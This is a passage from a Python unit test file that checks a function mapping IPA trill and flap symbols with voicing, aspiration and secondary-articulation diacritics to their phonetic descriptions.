def test_ʙ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ˤ")
self.assertEqual(actual, expected)
def test_ʙ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced bilabial trill pulmonic egressive consonant
def test_ʙ_is_the_representation_of_the_voiced_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ")
self.assertEqual(actual, expected)
# voiced labialized bilabial trill pulmonic egressive consonant
def test_ʙʷ_is_the_representation_of_the_voiced_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial trill pulmonic egressive consonant
def test_ʙʲ_is_the_representation_of_the_voiced_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial trill pulmonic egressive consonant
def test_ʙˠ_is_the_representation_of_the_voiced_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial trill pulmonic egressive consonant
def test_ʙˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial trill pulmonic egressive consonant
def test_ʙʰ_is_the_representation_of_the_voiced_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized bilabial trill pulmonic egressive consonant
def test_ʙʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰʷ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial trill pulmonic egressive consonant
def test_ʙʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰʲ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial trill pulmonic egressive consonant
def test_ʙʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰˠ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial trill pulmonic egressive consonant
def test_ʙʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰˤ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar trill pulmonic egressive consonant
def test_r̊_is_the_representation_of_the_voiceless_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊")
self.assertEqual(actual, expected)
def test_r̥_is_the_representation_of_the_voiceless_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar trill pulmonic egressive consonant
def test_r̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʷ")
self.assertEqual(actual, expected)
def test_r̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar trill pulmonic egressive consonant
def test_r̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʲ")
self.assertEqual(actual, expected)
def test_r̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar trill pulmonic egressive consonant
def test_r̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ˠ")
self.assertEqual(actual, expected)
def test_r̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar trill pulmonic egressive consonant
def test_r̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ˤ")
self.assertEqual(actual, expected)
def test_r̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar trill pulmonic egressive consonant
def test_r̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰ")
self.assertEqual(actual, expected)
def test_r̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar trill pulmonic egressive consonant
def test_r̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰʷ")
self.assertEqual(actual, expected)
def test_r̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar trill pulmonic egressive consonant
def test_r̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰʲ")
self.assertEqual(actual, expected)
def test_r̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar trill pulmonic egressive consonant
def test_r̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰˠ")
self.assertEqual(actual, expected)
def test_r̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar trill pulmonic egressive consonant
def test_r̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰˤ")
self.assertEqual(actual, expected)
def test_r̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar trill pulmonic egressive consonant
def test_r_is_the_representation_of_the_voiced_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r")
self.assertEqual(actual, expected)
# voiced labialized alveolar trill pulmonic egressive consonant
def test_rʷ_is_the_representation_of_the_voiced_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar trill pulmonic egressive consonant
def test_rʲ_is_the_representation_of_the_voiced_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar trill pulmonic egressive consonant
def test_rˠ_is_the_representation_of_the_voiced_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar trill pulmonic egressive consonant
def test_rˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar trill pulmonic egressive consonant
def test_rʰ_is_the_representation_of_the_voiced_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰ")
self.assertEqual(actual, expected)
def test_r̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar trill pulmonic egressive consonant
def test_rʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰʷ")
self.assertEqual(actual, expected)
def test_r̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar trill pulmonic egressive consonant
def test_rʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰʲ")
self.assertEqual(actual, expected)
def test_r̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar trill pulmonic egressive consonant
def test_rʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰˠ")
self.assertEqual(actual, expected)
def test_r̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar trill pulmonic egressive consonant
def test_rʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰˤ")
self.assertEqual(actual, expected)
def test_r̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless uvular trill pulmonic egressive consonant
def test_ʀ̊_is_the_representation_of_the_voiceless_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊")
self.assertEqual(actual, expected)
def test_ʀ̥_is_the_representation_of_the_voiceless_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular trill pulmonic egressive consonant
def test_ʀ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʷ")
self.assertEqual(actual, expected)
def test_ʀ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular trill pulmonic egressive consonant
def test_ʀ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʲ")
self.assertEqual(actual, expected)
def test_ʀ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular trill pulmonic egressive consonant
def test_ʀ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ˠ")
self.assertEqual(actual, expected)
def test_ʀ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular trill pulmonic egressive consonant
def test_ʀ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ˤ")
self.assertEqual(actual, expected)
def test_ʀ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular trill pulmonic egressive consonant
def test_ʀ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular trill pulmonic egressive consonant
def test_ʀ_is_the_representation_of_the_voiced_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ")
self.assertEqual(actual, expected)
# voiced labialized uvular trill pulmonic egressive consonant
def test_ʀʷ_is_the_representation_of_the_voiced_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular trill pulmonic egressive consonant
def test_ʀʲ_is_the_representation_of_the_voiced_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular trill pulmonic egressive consonant
def test_ʀˠ_is_the_representation_of_the_voiced_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular trill pulmonic egressive consonant
def test_ʀˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular trill pulmonic egressive consonant
def test_ʀʰ_is_the_representation_of_the_voiced_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular trill pulmonic egressive consonant
def test_ʀʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰʷ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized uvular trill pulmonic egressive consonant
def test_ʀʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰʲ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular trill pulmonic egressive consonant
def test_ʀʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰˠ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular trill pulmonic egressive consonant
def test_ʀʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰˤ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊_is_the_representation_of_the_voiceless_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊")
self.assertEqual(actual, expected)
def test_ⱱ̥_is_the_representation_of_the_voiceless_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥")
self.assertEqual(actual, expected)
# voiceless labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʷ")
self.assertEqual(actual, expected)
def test_ⱱ̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʲ")
self.assertEqual(actual, expected)
def test_ⱱ̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ˠ")
self.assertEqual(actual, expected)
def test_ⱱ̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
